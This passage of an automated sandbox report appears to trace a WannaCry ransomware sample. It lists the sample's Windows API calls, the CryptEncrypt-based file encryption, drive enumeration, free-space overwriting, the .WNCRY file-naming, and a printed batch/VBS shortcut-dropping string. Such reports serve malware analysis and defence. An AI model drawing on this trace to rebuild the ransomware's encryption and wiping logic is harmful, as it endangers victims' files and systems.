      • Part of subcall function 10001910: wcscpy.MSVCRT ref: 10001920
      • Part of subcall function 10001910: swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 1000194B
    APIs
      • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,76E76DBE,76E76DBE,10003D9E,?,76E76DBE,00000000), ref: 10003A9D
      • Part of subcall function 10003F00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
      • Part of subcall function 10003F00: GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
      • Part of subcall function 10003F00: GlobalAlloc.KERNEL32(00000000,00000000), ref: 10003F8A
      • Part of subcall function 10003F00: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10003FA2
      • Part of subcall function 10003F00: CryptImportKey.ADVAPI32(76E76DBE,00000000,?,00000000,00000000,?), ref: 10003FC5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10003FD5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10004017
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,76E76DBE,00000000), ref: 10003E2B
    • _local_unwind2.MSVCRT ref: 10003E3B
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,?,?,?,76E76DBE,00000000), ref: 10003E70
    • strncmp.MSVCRT(00000000,76E76DBE,?,?,?,?,?,76E76DBE,00000000), ref: 10003EA1
    • _local_unwind2.MSVCRT ref: 10003EB4
    APIs
      • Part of subcall function 10004420: CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
    • EnterCriticalSection.KERNEL32(?,00000010,?,?,?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043CA
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,10001DBA,?,00000000,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043E7
    • LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043F2
    • LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 10004401
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,768DF708), ref: 1000139C
    • CheckTokenMembership.ADVAPI32(00000000,?,768DF708,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
    • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
    APIs
    • CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
    • CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
    • CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,76E76DBE,76E76DBE,10003D9E,?,76E76DBE,00000000), ref: 10003A9D
    APIs
    • CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
    APIs
      • Part of subcall function 10001590: ??2@YAPAXI@Z.MSVCRT ref: 100015FC
      • Part of subcall function 10001830: GlobalAlloc.KERNEL32(00000000,00100000,10005340,00000000,76E6C426,00000000,1000580C,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10001869
      • Part of subcall function 10001830: GlobalAlloc.KERNEL32(00000000,00100000), ref: 10001881
      • Part of subcall function 10001830: InitializeCriticalSection.KERNEL32(?), ref: 10001899
      • Part of subcall function 10001830: CreateThread.KERNEL32(00000000,00000000,100029E0,?,00000000,00000000), ref: 100018AD
      • Part of subcall function 10001830: GetTickCount.KERNEL32 ref: 100018CD
      • Part of subcall function 10001830: srand.MSVCRT ref: 100018D4
    • GetFileAttributesA.KERNEL32(f.wnry,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10005819
    • time.MSVCRT ref: 1000583D
    • sprintf.MSVCRT ref: 1000585F
      • Part of subcall function 10001000: fopen.MSVCRT ref: 1000101B
      • Part of subcall function 10001000: fread.MSVCRT ref: 1000103B
      • Part of subcall function 10001000: fwrite.MSVCRT ref: 10001048
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001056
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001064
      • Part of subcall function 10004CD0: GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe,00000000), ref: 10004CE2
      • Part of subcall function 10004CD0: CopyFileA.KERNEL32(u.wnry,@WanaDecryptor@.exe,00000000), ref: 10004CF5
      • Part of subcall function 10004CD0: GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe.lnk), ref: 10004D00
      • Part of subcall function 10004CD0: GetCurrentDirectoryA.KERNEL32(00000208,?,76E6C426), ref: 10004D45
      • Part of subcall function 10004CD0: sprintf.MSVCRT ref: 10004DC2
      • Part of subcall function 10004DF0: GetFileAttributesW.KERNEL32(@Please_Read_Me@.txt,76E6C426,00000000,00000000,1000588E), ref: 10004E02
      • Part of subcall function 10004DF0: fopen.MSVCRT ref: 10004E1B
      • Part of subcall function 10004DF0: fread.MSVCRT ref: 10004E50
      • Part of subcall function 10004DF0: fclose.MSVCRT ref: 10004E5D
      • Part of subcall function 10004DF0: _wfopen.MSVCRT ref: 10004E69
      • Part of subcall function 10004DF0: _ftol.MSVCRT ref: 10004E8B
      • Part of subcall function 10004DF0: sprintf.MSVCRT ref: 10004EA1
      • Part of subcall function 10004DF0: sprintf.MSVCRT ref: 10004EC4
      • Part of subcall function 10004DF0: sprintf.MSVCRT ref: 10004EE5
      • Part of subcall function 10004DF0: fwrite.MSVCRT ref: 10004F03
      • Part of subcall function 10004DF0: fclose.MSVCRT ref: 10004F0A
      • Part of subcall function 10005480: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,76E6C426), ref: 100054B6
      • Part of subcall function 10005480: wcslen.MSVCRT ref: 100054C3
      • Part of subcall function 10005480: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 100054F5
      • Part of subcall function 10005480: wcslen.MSVCRT ref: 100054FC
    • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100058C1
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    • GetLogicalDrives.KERNEL32 ref: 1000591C
    • GetDriveTypeW.KERNEL32(?), ref: 10005964
    • GetDriveTypeW.KERNEL32(?), ref: 10005977
      • Part of subcall function 10005540: InterlockedExchangeAdd.KERNEL32(1000D4E4,00000000), ref: 1000557E
      • Part of subcall function 10005540: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 100055AE
      • Part of subcall function 10005540: Sleep.KERNEL32(000003E8), ref: 100055CB
      • Part of subcall function 10005540: GetDriveTypeW.KERNEL32(?), ref: 100055E9
      • Part of subcall function 10005540: GetDriveTypeW.KERNEL32(00000000,00000000,00000019,76E6EEF2,00000000), ref: 100055FD
      • Part of subcall function 10005540: InterlockedExchange.KERNEL32(1000D4E4,?), ref: 1000560A
      • Part of subcall function 10005540: GetDriveTypeW.KERNEL32(?), ref: 10005615
    • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100059A4
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10004A97
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004A9E
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004AC0
      • Part of subcall function 10004A40: wcschr.MSVCRT ref: 10004AE9
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 10004B1B
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004B25
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004B3D
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\*.*,?), ref: 10004B87
      • Part of subcall function 10004A40: FindFirstFileW.KERNEL32(?,?), ref: 10004BA0
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BD7
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BF5
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,-00000002), ref: 10004C2F
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004C51
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,00000000), ref: 10004C79
      • Part of subcall function 10004A40: FindNextFileW.KERNEL32(?,?), ref: 10004CA2
      • Part of subcall function 10004A40: FindClose.KERNEL32(?), ref: 10004CB5
    • sprintf.MSVCRT ref: 100059DD
    • time.MSVCRT ref: 100059F6
      • Part of subcall function 10004730: CreateFileA.KERNEL32(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10004749
      • Part of subcall function 10004730: WriteFile.KERNEL32(00000000), ref: 10004775
      • Part of subcall function 10004730: CloseHandle.KERNEL32(00000000), ref: 1000477C
    • sprintf.MSVCRT ref: 10005A1F
      • Part of subcall function 10005190: GetDriveTypeW.KERNEL32(00000000,00000001,00000000,00000000), ref: 100051C0
      • Part of subcall function 10005190: GlobalAlloc.KERNEL32(00000000,00A00000), ref: 100051D6
      • Part of subcall function 10005190: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 1000522C
      • Part of subcall function 10005190: GlobalFree.KERNEL32(00000000), ref: 1000523A
      • Part of subcall function 10005190: MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10005254
      • Part of subcall function 10005190: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 1000527D
      • Part of subcall function 10005190: WriteFile.KERNEL32(00000000,00000000,00A00000,?,00000000), ref: 100052A9
      • Part of subcall function 10005190: Sleep.KERNEL32(0000000A), ref: 100052B5
      • Part of subcall function 10005190: Sleep.KERNEL32(00002710), ref: 100052C2
      • Part of subcall function 10005190: GlobalFree.KERNEL32(00000000), ref: 100052CE
      • Part of subcall function 10005190: FlushFileBuffers.KERNEL32(00000000), ref: 100052D5
      • Part of subcall function 10005190: CloseHandle.KERNEL32(00000000), ref: 100052DC
      • Part of subcall function 10005190: DeleteFileW.KERNEL32(?), ref: 100052E7
    • GetDriveTypeW.KERNEL32(?), ref: 10005A7D
    • Sleep.KERNEL32(0000EA60), ref: 10005A98
      • Part of subcall function 10001680: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,00000000,76E6C426,76E6EA18,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 100016DD
      • Part of subcall function 10001680: ??3@YAXPAX@Z.MSVCRT ref: 100016E4
      • Part of subcall function 10001680: ??3@YAXPAX@Z.MSVCRT ref: 10001705
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • Sleep.KERNEL32(000003E8,?,?,?,?,100029E9), ref: 10002A17
    • EnterCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002A36
    • wcslen.MSVCRT ref: 10002A69
    • MoveFileExW.KERNEL32(69501440,?,00000001), ref: 10002A7A
    • GetFileAttributesW.KERNEL32(?), ref: 10002A85
    • GetFileAttributesW.KERNEL32(?), ref: 10002A91
    • SetFileAttributesW.KERNEL32(?,00000000), ref: 10002A9B
    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10002AA5
    • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 10002ACD
    • MoveFileExW.KERNEL32(69501440,?,00000001), ref: 10002ADA
    • DeleteFileW.KERNEL32(69501440), ref: 10002AE5
    • GetFileAttributesW.KERNEL32(69501440), ref: 10002AF0
    • SetFileAttributesW.KERNEL32(69501440,00000000), ref: 10002AFA
    • MoveFileExW.KERNEL32(69501440,00000000,00000004), ref: 10002B04
    • ??3@YAXPAX@Z.MSVCRT ref: 10002B3E
    • ??3@YAXPAX@Z.MSVCRT ref: 10002B50
    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002B76
    • ExitThread.KERNEL32 ref: 10002B89
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10004440: LoadLibraryA.KERNEL32(advapi32.dll), ref: 10004456
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?), ref: 10004473
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 10004480
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 1000448D
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 1000449A
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 100044A7
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 100044B4
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10003433
    • GetProcAddress.KERNEL32(00000000,CreateFileW,?), ref: 10003450
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 1000345D
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 1000346A
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 10003477
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 10003484
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 10003491
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 1000349E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetDriveTypeW.KERNEL32(00000000,00000001,00000000,00000000), ref: 100051C0
    • GlobalAlloc.KERNEL32(00000000,00A00000), ref: 100051D6
      • Part of subcall function 10005120: swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
      • Part of subcall function 10005120: DeleteFileW.KERNEL32(?), ref: 10005174
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 1000522C
    • GlobalFree.KERNEL32(00000000), ref: 1000523A
    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10005254
    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 1000527D
    • WriteFile.KERNEL32(00000000,00000000,00A00000,?,00000000), ref: 100052A9
    • Sleep.KERNEL32(0000000A), ref: 100052B5
    • Sleep.KERNEL32(00002710), ref: 100052C2
    • GlobalFree.KERNEL32(00000000), ref: 100052CE
    • FlushFileBuffers.KERNEL32(00000000), ref: 100052D5
    • CloseHandle.KERNEL32(00000000), ref: 100052DC
    • DeleteFileW.KERNEL32(?), ref: 100052E7
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetFileAttributesW.KERNEL32(?,768ED335,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
    • SetFileAttributesW.KERNEL32(?,00000000), ref: 10003044
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 10003059
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1000308A
    • GetFileSizeEx.KERNEL32(00000000,?,00000000), ref: 100030AA
      • Part of subcall function 10004420: CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
    • SetFilePointer.KERNEL32(00000000,FFFFFC00,00000000,00000002), ref: 1000314C
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000316F
    • FlushFileBuffers.KERNEL32(00000000), ref: 10003176
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 10003183
    • WriteFile.KERNEL32(00000000,?,00040000,?,00000000), ref: 100031C8
    • CloseHandle.KERNEL32(00000000), ref: 100031EA
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe,00000000), ref: 10004CE2
    • CopyFileA.KERNEL32(u.wnry,@WanaDecryptor@.exe,00000000), ref: 10004CF5
    • GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe.lnk), ref: 10004D00
    • GetCurrentDirectoryA.KERNEL32(00000208,?,76E6C426), ref: 10004D45
    • sprintf.MSVCRT ref: 10004DC2
      • Part of subcall function 10001140: GetTickCount.KERNEL32(@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs), ref: 10001147
      • Part of subcall function 10001140: srand.MSVCRT ref: 1000114E
      • Part of subcall function 10001140: time.MSVCRT ref: 10001156
      • Part of subcall function 10001140: rand.MSVCRT ref: 10001160
      • Part of subcall function 10001140: sprintf.MSVCRT ref: 10001171
      • Part of subcall function 10001140: fopen.MSVCRT ref: 10001181
      • Part of subcall function 10001140: fprintf.MSVCRT ref: 100011A6
      • Part of subcall function 10001140: fclose.MSVCRT ref: 100011AD
    Strings
    • @WanaDecryptor@.exe, xrefs: 10004CDD
    • @WanaDecryptor@.exe.lnk, xrefs: 10004DAC
    • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10004D11
    • u.wnry, xrefs: 10004CF0
    • \, xrefs: 10004D67
    • @WanaDecryptor@.exe.lnk, xrefs: 10004CFB
    • @WanaDecryptor@.exe, xrefs: 10004CEB, 10004DA2
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
    • GetTempPathW.KERNEL32(00000104,?), ref: 10005094
    • wcslen.MSVCRT ref: 100050A1
    • wcslen.MSVCRT ref: 100050AB
    • wcslen.MSVCRT ref: 100050B9
    • swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
    • CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
    • sprintf.MSVCRT ref: 100050FE
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • wcscpy.MSVCRT ref: 1000222D
    • wcsrchr.MSVCRT ref: 10002236
    • _wcsicmp.MSVCRT ref: 1000224B
    • wcscpy.MSVCRT ref: 1000225E
    • wcscat.MSVCRT ref: 1000226F
    • swprintf.MSVCRT(?,%s%s,?,.WNCYR,?,?,?,?), ref: 10002291
    • GetFileAttributesW.KERNEL32(?), ref: 1000229F
    • DeleteFileW.KERNEL32(?,?,?,?), ref: 100022C3
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002BD9
      • Part of subcall function 10002BA0: EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002C15
      • Part of subcall function 10002BA0: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
      • Part of subcall function 10002BA0: ??2@YAPAXI@Z.MSVCRT ref: 10002C57
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
      • Part of subcall function 10002BA0: ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002D04
      • Part of subcall function 10002BA0: DeleteFileW.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A21
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A57
      • Part of subcall function 10001960: GetFileSizeEx.KERNEL32(00000000,?,?,?), ref: 10001A7C
      • Part of subcall function 10001960: GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 10001AA7
      • Part of subcall function 10001960: ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 10001AC0
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B00
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 10001B3A
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B5D
      • Part of subcall function 10001960: _local_unwind2.MSVCRT ref: 10001B78
      • Part of subcall function 10001960: SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 10001BAB
      • Part of subcall function 10001960: swprintf.MSVCRT(?,%s%s,?,1000CBE4,?,?), ref: 10001BCC
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10001BEE
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 10001C1A
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001C71
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?), ref: 10001C96
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001CAE
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001CDF
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001CFB
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001D20
      • Part of subcall function 10001960: rand.MSVCRT ref: 10001D54
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,WANACRY!,00000008,00010000,00000000), ref: 10001E22
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,00000200,00000004,00010000,00000000), ref: 10001E43
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00000200,00010000,00000000), ref: 10001E69
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,00000004,00000004,00010000,00000000), ref: 10001E87
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00000008,00010000,00000000), ref: 10001EA8
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,FFFF0000,00000000,00000002,?,?), ref: 10001EEF
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F0B
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F5C
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00010000,00000000,00000000,?,?), ref: 10001F84
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00100000,00010000,00000000), ref: 10001FE8
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10002072
      • Part of subcall function 10001960: _local_unwind2.MSVCRT ref: 1000208E
      • Part of subcall function 10001960: SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 100020CD
      • Part of subcall function 10001960: CloseHandle.KERNEL32(?), ref: 100020DA
      • Part of subcall function 10001960: CloseHandle.KERNEL32(?), ref: 100020E1
      • Part of subcall function 10001960: MoveFileW.KERNEL32(?,?), ref: 10002101
      • Part of subcall function 10001960: SetFileAttributesW.KERNELBASE(?,00000080,?,?), ref: 10002119
      • Part of subcall function 10001960: DeleteFileW.KERNEL32(?,?,?), ref: 10002128
      • Part of subcall function 10001960: CloseHandle.KERNEL32(?), ref: 10002130
      • Part of subcall function 10001960: MoveFileW.KERNEL32(?,?), ref: 1000214D
      • Part of subcall function 10001960: _local_unwind2.MSVCRT ref: 1000218F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetTickCount.KERNEL32(@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs), ref: 10001147
    • srand.MSVCRT ref: 1000114E
    • time.MSVCRT ref: 10001156
    • rand.MSVCRT ref: 10001160
    • sprintf.MSVCRT ref: 10001171
    • fopen.MSVCRT ref: 10001181
    • fprintf.MSVCRT ref: 100011A6
    • fclose.MSVCRT ref: 100011AD
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
